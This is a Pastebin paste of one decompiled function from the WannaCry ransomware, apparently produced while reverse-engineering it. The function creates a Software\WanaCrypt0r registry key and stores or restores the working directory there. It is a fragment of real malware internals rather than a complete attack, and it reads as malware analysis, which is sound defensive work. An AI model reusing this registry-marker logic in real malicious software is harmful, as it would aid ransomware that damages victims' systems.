API tools faq
paste
Advertisement
GlobalHell2K17

set_or_query_registry_cwd (FUN_004010fd) Decompiled

GlobalHell2K17
May 20th, 2019
171
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C++ 2.25 KB | None | 0 0
raw download clone embed print report
  1.  
  2. undefined4 __cdecl set_or_query_registry_cwd(int set_registry)
  3.  
  4. {
  5.   size_t current_dir_length;
  6.   LSTATUS LVar1;
  7.   int iVar2;
  8.   undefined4 *software_str;
  9.   undefined4 *puVar3;
  10.   bool bVar4;
  11.   HKEY hKey;
  12.   BYTE registry_value;
  13.   undefined4 local_2df [129];
  14.   undefined4 software_str_buf [5];
  15.   undefined4 local_c4 [45];
  16.   DWORD local_10;
  17.   int i;
  18.   HKEY regWanaHandle;
  19.  
  20.   iVar2 = 5;
  21.   software_str = (undefined4 *)u_Software\_0040e04c;
  22.   puVar3 = software_str_buf;
  23.   while (iVar2 != 0) {
  24.     iVar2 = iVar2 + -1;
  25.     *puVar3 = *software_str;
  26.     software_str = software_str + 1;
  27.     puVar3 = puVar3 + 1;
  28.   }
  29.   registry_value = 0;
  30.   iVar2 = 0x2d;
  31.   regWanaHandle = (HKEY)0x0;
  32.   puVar3 = local_c4;
  33.   while (iVar2 != 0) {
  34.     iVar2 = iVar2 + -1;
  35.     *puVar3 = 0;
  36.     puVar3 = puVar3 + 1;
  37.   }
  38.   iVar2 = 0x81;
  39.   puVar3 = local_2df;
  40.   while (iVar2 != 0) {
  41.     iVar2 = iVar2 + -1;
  42.     *puVar3 = 0;
  43.     puVar3 = puVar3 + 1;
  44.   }
  45.   *(undefined2 *)puVar3 = 0;
  46.   *(undefined *)((int)puVar3 + 2) = 0;
  47.                     /* Software\WanaCrypt0r */
  48.   wcscat((wchar_t *)software_str_buf,u_WanaCrypt0r_0040e034);
  49.   i = 0;
  50.   do {
  51.     if (i == 0) {
  52.                     /* HKEY_LOCAL_MACHINE */
  53.       hKey = (HKEY)0x80000002;
  54.     }
  55.     else {
  56.                     /* HKEY_CURRENT_USER */
  57.       hKey = (HKEY)0x80000001;
  58.     }
  59.     RegCreateKeyW(hKey,(LPCWSTR)software_str_buf,(PHKEY)&regWanaHandle);
  60.     if (regWanaHandle != (HKEY)0x0) {
  61.       if (set_registry == 0) {
  62.         local_10 = 0x207;
  63.         LVar1 = RegQueryValueExA(regWanaHandle,s_wd_0040e030,(LPDWORD)0x0,(LPDWORD)0x0,
  64.                                  &registry_value,&local_10);
  65.         bVar4 = LVar1 == 0;
  66.         if (bVar4) {
  67.           SetCurrentDirectoryA((LPCSTR)&registry_value);
  68.         }
  69.       }
  70.       else {
  71.         GetCurrentDirectoryA(0x207,(LPSTR)&registry_value);
  72.         current_dir_length = strlen((char *)&registry_value);
  73.         LVar1 = RegSetValueExA(regWanaHandle,s_wd_0040e030,0,1,&registry_value,
  74.                                current_dir_length + 1);
  75.         bVar4 = LVar1 == 0;
  76.       }
  77.       RegCloseKey(regWanaHandle);
  78.       if (bVar4) {
  79.         return 1;
  80.       }
  81.     }
  82.     i = i + 1;
  83.     if (1 < i) {
  84.       return 0;
  85.     }
  86.   } while( true );
  87. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!